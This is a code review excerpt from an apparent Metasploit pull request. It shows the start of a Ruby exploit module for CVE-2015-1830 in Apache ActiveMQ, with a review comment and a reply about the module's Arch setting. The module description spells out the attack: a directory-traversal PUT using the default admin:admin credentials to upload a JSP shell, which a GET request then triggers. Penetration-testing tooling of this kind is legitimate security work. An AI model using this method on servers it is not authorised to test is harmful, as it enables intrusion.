modules/exploits/windows/http/apache_activemq_traversal_upload.rb

```diff
@@ -0,0 +1,114 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Apache ActiveMQ directory traversal shell upload',
+      'Description'    => %q{
+        This module exploits a directory traversal vulnerability (CVE-2015-1830) in Apache ActiveMQ 5.x before 5.11.2 for Windows. It tries to upload a JSP payload to the /admin directory via the traversal path /fileserver/..\\admin\\ using an HTTP PUT request with the default credentials admin:admin. It then issues an HTTP GET request to /admin/<payload>.jsp on the target in order to trigger the payload and obtain a shell.
+      },
+      'Author'      => 'Erik Wynter', #@wyntererik
+      'References'     =>
+        [
+          [ 'CVE', '2015-1830' ],
+          [ 'URL', 'https://activemq.apache.org/security-advisories.data/CVE-2015-1830-announcement.txt' ]
+        ],
+      'Privileged'     => false,
+      'Platform'    => %w{ win },
+      'Targets'     =>
+        [
+          [ 'Windows Java',
+            {
+              'Arch' => ARCH_JAVA,
```

Comment:
I know this is JSP, but does it actually affect the JRE running on the server? Not really sure if this is completely necessary.

Reply:
The Arch affects what payloads are available to be selected when running the module, this looks like the right choice